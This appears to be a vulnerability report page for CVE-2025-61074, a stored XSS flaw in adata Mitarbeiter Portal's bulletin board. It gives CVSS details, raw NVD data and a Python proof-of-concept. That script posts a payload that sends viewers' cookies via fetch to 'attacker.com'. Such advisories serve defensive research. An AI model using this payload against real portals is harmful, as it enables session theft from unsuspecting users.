Security Vulnerability Report
CVE-2025-61074 (CVSS 4.6, MEDIUM)

Published: 2025-12-09 16:18:00
Last Modified: 2026-01-14 15:15:58

Description

A stored Cross Site Scripting (XSS) vulnerability in the bulletin board (SchwarzeBrett) in adata Software GmbH Mitarbeiter Portal 2.15.2.0 allows remote authenticated users to execute arbitrary JavaScript code in the web browser of other users via manipulation of the 'Inhalt' parameter of the '/SchwarzeBrett/Nachrichten/CreateNachricht' or '/SchwarzeBrett/Nachrichten/EditNachricht/' requests.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adata:mitarbeiter_portal:*:*:*:*:*:*:*:* - VULNERABLE
adata Software GmbH Mitarbeiter Portal < 2.15.2.0
Note that the CPE match in the raw record below sets versionEndExcluding to 2.16.1, so the affected range in the NVD data is every version before 2.16.1, which includes the 2.15.2.0 release named in the description.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-61074 PoC - Stored XSS in adata Mitarbeiter Portal
# Target: /SchwarzeBrett/Nachrichten/CreateNachricht
TARGET_URL = "http://target-server/SchwarzeBrett/Nachrichten/CreateNachricht"
LOGIN_URL = "http://target-server/api/auth/login"

# Malicious XSS payload
XSS_PAYLOAD = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"


def exploit():
    # Step 1: Authenticate with low-privilege account
    session = requests.Session()
    login_data = {
        "username": "attacker_user",
        "password": "password123"
    }
    session.post(LOGIN_URL, json=login_data)

    # Step 2: Create message with XSS payload in 'Inhalt' parameter
    message_data = {
        "Inhalt": XSS_PAYLOAD,
        "Titel": "Test Message"
    }
    response = session.post(TARGET_URL, json=message_data)

    # Step 3: When other users view the bulletin board,
    # the stored script will execute in their browsers
    print(f"Exploit sent. Status: {response.status_code}")
    print(f"Payload stored: {XSS_PAYLOAD}")


if __name__ == "__main__":
    exploit()
```

References

https://no-sec.net/posts/cve-2025-61074/ (Exploit, Third Party Advisory)
https://www.adata.de/mitarbeiter-portal/ (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61074",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T16:17:59.957",
    "lastModified": "2026-01-14T15:15:57.587",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross Site Scripting (XSS) vulnerability in the bulletin board (SchwarzeBrett) in adata Software GmbH Mitarbeiter Portal 2.15.2.0 allows remote authenticated users to execute arbitrary JavaScript code in the web browser of other users via manipulation of the 'Inhalt' parameter of the '/SchwarzeBrett/Nachrichten/CreateNachricht' or '/SchwarzeBrett/Nachrichten/EditNachricht/' requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:adata:mitarbeiter_portal:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.16.1",
                "matchCriteriaId": "4F088A9A-0FDB-4E69-AB75-5CE0609F65FA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://no-sec.net/posts/cve-2025-61074/",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://www.adata.de/mitarbeiter-portal/",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}
```